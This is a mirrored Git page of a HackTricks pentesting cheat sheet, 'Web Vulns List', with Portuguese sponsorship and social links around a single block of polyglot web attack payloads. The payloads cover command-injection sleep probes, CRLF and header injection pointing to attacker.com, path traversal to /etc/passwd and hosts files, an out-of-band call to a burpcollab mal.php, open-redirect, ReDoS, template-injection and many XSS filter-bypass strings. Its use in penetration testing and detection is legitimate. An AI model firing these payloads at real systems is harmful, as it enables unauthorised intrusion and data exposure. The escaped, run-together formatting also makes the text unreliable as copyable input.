Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-01 00:49:40 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md

35 lines
5 KiB
Markdown
Raw Normal View History

GitBook: No commit message
2023-08-29 18:57:50 +00:00
# Web Vulns List
## Lista de Vulnerabilidades Web
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
update twitter
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
GitBook: No commit message
2023-08-29 18:57:50 +00:00
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
GitBook: No commit message
2023-08-29 18:57:50 +00:00
\`\`\`python \{{7\*7\}}\[7\*7] 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /\*$(sleep 5)\`sleep 5\`\`\*/-sleep(5)-'/\*$(sleep 5)\`sleep 5\` #\*/-sleep(5)||'"||sleep(5)||"/\*\`\*/ %0d%0aLocation:%20http://attacker.com %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E\
## THIS IS AND INJECTED TITLE
/etc/passwd ../../../../../../etc/hosts ..\\..\\..\\..\\..\\..\etc/hosts /etc/hostname ../../../../../../etc/hosts C:/windows/system32/drivers/etc/hosts ../../../../../../windows/system32/drivers/etc/hosts ..\\..\\..\\..\\..\\..\windows/system32/drivers/etc/hosts http://asdasdasdasd.burpcollab.com/mal.php \\\asdasdasdasd.burpcollab.com/mal.php www.whitelisted.com www.whitelisted.com.evil.com https://google.com //google.com javascript:alert(1) (\\\w\*)+$ (\[a-zA-Z]+)\*$ ((a+)+)+$ x=>alert(/Chrome%20XSS%20filter%20bypass/);> \{{7\*7\}}${7\*7}<%= 7\*7 %>$\{{7\*7\}}#{7\*7}$\{{<%\[%'"\}}%\ " onclick=alert() a=" '">![](x) javascript:alert() javascript:"/\*'/\*\`/\*--> -->'"/>
&#x20;">>![](x)" >\<script>prompt(1)\</script>@gmail.com\<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" >\</script>\<script>alert(1)\</script>">\<img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">\<img src="http: //i.imgur.com/P8mL8.jpg">\
" onclick=alert(1)//\<button onclick=alert(1)//> \*/ alert(1)//\
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >\</SCRIPT>">'>\<SCRIPT>alert(String.fromCharCode(88,83,83)) \</SCRIPT>\
\`\`\`\
\<details>[**☁️ HackTricks Cloud ☁️**](https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology) -[**🐦 Twitter 🐦**](https://twitter.com/hacktricks\_live) - [**🎙️ Twitch 🎙️**](https://www.twitch.tv/hacktricks\_live/schedule) - [**🎥 Youtube 🎥**](https://www.youtube.com/@hacktricks\_LIVE)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
GitBook: No commit message
2023-08-29 18:57:50 +00:00
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) **grupo do Discord** ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
Reference in a new issue Copy permalink